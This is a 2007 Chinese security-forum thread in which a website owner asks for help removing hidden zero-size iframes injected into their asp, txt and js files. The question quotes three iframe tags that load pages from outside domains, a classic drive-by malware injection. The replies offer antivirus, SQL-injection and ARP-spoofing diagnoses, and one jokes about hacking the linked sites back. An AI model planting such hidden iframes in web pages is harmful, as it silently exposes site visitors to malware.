救命啊!!清除不干净的代码呀~~~~!有高手吗?帮俺看看呀~~

caoxuhui 2007-03-17 09:01:18
我们网站的asp,txt,js文件里面都插入了
<iframe src="http://www.54699.com/wm/20/1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.5166.com.cn/51666/images/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://chanm520.my.5944.net/" width="0" height="0" frameborder="0"></iframe>
这些代码
我们用dreamweaver 查找替换的方法也清除不干净呀~~
请问哪个高手遇到过这种情况有什么彻底的方法解决吗?谢谢了!
...全文
578 26 打赏 收藏 转发到动态 举报
写回复
用AI写文章
26 条回复
切换为时间正序
请发表友善的回复…
发表回复
xter 2007-04-28
  • 打赏
  • 举报
回复
直接把他里面的网站全部黑掉就可以了。
smallcrocodile 2007-04-27
  • 打赏
  • 举报
回复
中招了吧
caoxuhui 2007-04-26
  • 打赏
  • 举报
回复
dreamweaver没有病毒呀~~现在问题找到的是注入的问题,怎么才能防注入呀怎么才能注入点不被扫描到,数据库表名不被扫到呀~大家有什么好的防御办法吗?
网站结构是win 2003+ SQL2000 +IIS!!!
roek0 2007-04-18
  • 打赏
  • 举报
回复
你的dreamweaver是不是有病毒???
空心兜兜 2007-04-17
  • 打赏
  • 举报
回复
帮顶……
迈克揉索芙特 2007-04-16
  • 打赏
  • 举报
回复
不知楼主是否已经解决?我的专杀程序对付这个就像踩蚂蚁。
www.chenoe.com/antivirus
caoxuhui 2007-03-30
  • 打赏
  • 举报
回复
我们有正版的瑞星也不行啊!
zzxiaoma 2007-03-30
  • 打赏
  • 举报
回复
瑞星,现在有免费用的,下个可以升级
caoxuhui 2007-03-30
  • 打赏
  • 举报
回复
有高手指导一下么?我的QQ是9835208
caoxuhui 2007-03-30
  • 打赏
  • 举报
回复
我用金山灰鸽子专杀工具查到有灰鸽子,已经杀掉了,但是还是会插入代码呀!!!
我杂能不让插入代码呀!在源代码里能看到那些代码的!!!
紫郢剑侠 2007-03-29
  • 打赏
  • 举报
回复
江民的熊猫专杀比较好
mozhu916 2007-03-29
  • 打赏
  • 举报
回复
服务器先杀毒,再修改文件中的代码。
fourfour 2007-03-29
  • 打赏
  • 举报
回复
楼主是否是这种情况:
浏览器中浏览时,能看到这些帧代码,但在原本的文件代码中查不到这些代码。

若是的话,这是属于ARP欺骗。最好联系下服务器机房的网管,将此情况说明,绑定网关。
请上百度查阅相关解决办法。
myangelonline 2007-03-29
  • 打赏
  • 举报
回复

殺毒先.....
hunhun02 2007-03-29
  • 打赏
  • 举报
回复
我觉得也是注入可能性大些
cxdeels 2007-03-29
  • 打赏
  • 举报
回复
是不是有JS限制??
robxw 2007-03-23
  • 打赏
  • 举报
回复
可能不是中毒,楼主的服务器也许有漏洞(例如SQL注入),被黑客大量挂马
先查查服务器的log吧
caoxuhui 2007-03-23
  • 打赏
  • 举报
回复
不是熊猫烧香,我用金山毒霸的熊猫烧香专杀工具杀了,没查出来什么呀~~
MseRen 2007-03-22
  • 打赏
  • 举报
回复
估计是熊猫烧香吧.楼主请去下一个熊猫烧香作者写的病毒专杀工具试试看.
MseRen 2007-03-22
  • 打赏
  • 举报
回复
中毒了...请先杀毒.
加载更多回复(6)

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧